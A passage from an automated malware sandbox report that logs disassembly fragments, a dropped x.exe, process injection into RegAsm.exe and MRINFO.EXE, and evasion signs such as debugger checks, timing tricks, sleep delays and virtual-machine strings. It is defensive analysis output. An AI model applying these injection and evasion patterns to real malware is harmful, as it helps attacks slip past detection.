                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004150CE push ebx; retf 5_2_004150D1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004150B0 push edx; ret 5_2_004150B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041897B push ecx; iretd 5_2_0041897C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00412993 push ecx; iretd 5_2_0041299A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00405AB5 push ecx; retf 5_2_00405ABF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004033F0 push eax; ret 5_2_004033F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00416BA0 push eax; retf 5_2_00416BA1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004194D8 push esp; iretd 5_2_004194DD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040D492 push eax; retf 5_2_0040D493
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041862C push C22D13DCh; retf 5_2_00418634
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040D6CC push es; retf 5_2_0040D6D1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00414E9F push ebx; retf 5_2_00414EA1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00417763 push ss; iretd 5_2_00417743
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00417723 push ss; iretd 5_2_00417743
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B209AD push ecx; mov dword ptr [esp], ecx5_2_02B209B6
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeCode function: 9_2_03272B73 push ecx; iretd 9_2_03272B7A
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeCode function: 9_2_03278B5B push ecx; iretd 9_2_03278B5C
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeCode function: 9_2_032752AE push ebx; retf 9_2_032752B1
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeCode function: 9_2_03275290 push edx; ret 9_2_03275291
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeCode function: 9_2_0327793E push ss; iretd 9_2_03277923
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeCode function: 9_2_03277903 push ss; iretd 9_2_03277923
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeCode function: 9_2_0327611C push FFFFFFC3h; iretd 9_2_0327611E
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeCode function: 9_2_0327880C push C22D13DCh; retf 9_2_03278814
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeCode function: 9_2_0327507F push ebx; retf 9_2_03275081
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeCode function: 9_2_0326D8AC push es; retf 9_2_0326D8B1
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeCode function: 9_2_032760C1 push edi; iretd 9_2_032760C2
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeCode function: 9_2_03275FB9 push eax; iretd 9_2_03275FBA
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeCode function: 9_2_0326D672 push eax; retf 9_2_0326D673
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeCode function: 9_2_032796B8 push esp; iretd 9_2_032796BD
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeCode function: 9_2_03276D80 push eax; retf 9_2_03276D81
                Source: x.exe.1.drStatic PE information: section name: .text entropy: 7.946498461797713
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\MRINFO.EXEAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\MRINFO.EXEAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\MRINFO.EXEAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\MRINFO.EXEAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\MRINFO.EXEAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\MRINFO.EXEAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\MRINFO.EXEAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\MRINFO.EXEAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2150000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 22E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 42E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B9D1C0 rdtsc 5_2_02B9D1C0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3503Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3129Jump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXEWindow / User API: threadDelayed 9841Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 0.8 %
                Source: C:\Windows\SysWOW64\MRINFO.EXEAPI coverage: 3.2 %
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1620Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3368Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6008Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXE TID: 6480Thread sleep count: 131 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXE TID: 6480Thread sleep time: -262000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXE TID: 6480Thread sleep count: 9841 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXE TID: 6480Thread sleep time: -19682000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe TID: 2860Thread sleep time: -40000s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\MRINFO.EXELast function: Thread delayed
                Source: C:\Windows\SysWOW64\MRINFO.EXELast function: Thread delayed
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0306CA70 FindFirstFileW,FindNextFileW,FindClose,10_2_0306CA70
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: powershell.exe, 00000001.00000002.1915624827.0000026D2323A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#1
                Source: powershell.exe, 00000001.00000002.1915624827.0000026D2323A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: wscript.exe, 00000000.00000002.1934243239.00000174E7A2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1923386809.00000174E7A27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWfd
                Source: wscript.exe, 00000000.00000002.1935377292.00000174E9C65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: sxkv2RIDKUVCF4X010eCnC.exe, 0000000B.00000002.2988938123.0000000000CA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]
                Source: wscript.exe, 00000000.00000002.1935377292.00000174E9C30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: MRINFO.EXE, 0000000A.00000002.2988076296.00000000032ED000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000C.00000002.2426979610.000001EDA820D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXEProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B9D1C0 rdtsc 5_2_02B9D1C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00417DE3 LdrLoadDll,5_2_00417DE3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA92BC mov eax, dword ptr fs:[00000030h]5_2_02BA92BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA92BC mov eax, dword ptr fs:[00000030h]5_2_02BA92BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA92BC mov ecx, dword ptr fs:[00000030h]5_2_02BA92BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA92BC mov ecx, dword ptr fs:[00000030h]5_2_02BA92BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B302A0 mov eax, dword ptr fs:[00000030h]5_2_02B302A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B302A0 mov eax, dword ptr fs:[00000030h]5_2_02B302A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B352A0 mov eax, dword ptr fs:[00000030h]5_2_02B352A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B352A0 mov eax, dword ptr fs:[00000030h]5_2_02B352A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B352A0 mov eax, dword ptr fs:[00000030h]5_2_02B352A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B352A0 mov eax, dword ptr fs:[00000030h]5_2_02B352A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE92A6 mov eax, dword ptr fs:[00000030h]5_2_02BE92A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE92A6 mov eax, dword ptr fs:[00000030h]5_2_02BE92A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE92A6 mov eax, dword ptr fs:[00000030h]5_2_02BE92A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE92A6 mov eax, dword ptr fs:[00000030h]5_2_02BE92A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BB72A0 mov eax, dword ptr fs:[00000030h]5_2_02BB72A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BB72A0 mov eax, dword ptr fs:[00000030h]5_2_02BB72A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BB62A0 mov eax, dword ptr fs:[00000030h]5_2_02BB62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BB62A0 mov ecx, dword ptr fs:[00000030h]5_2_02BB62A0
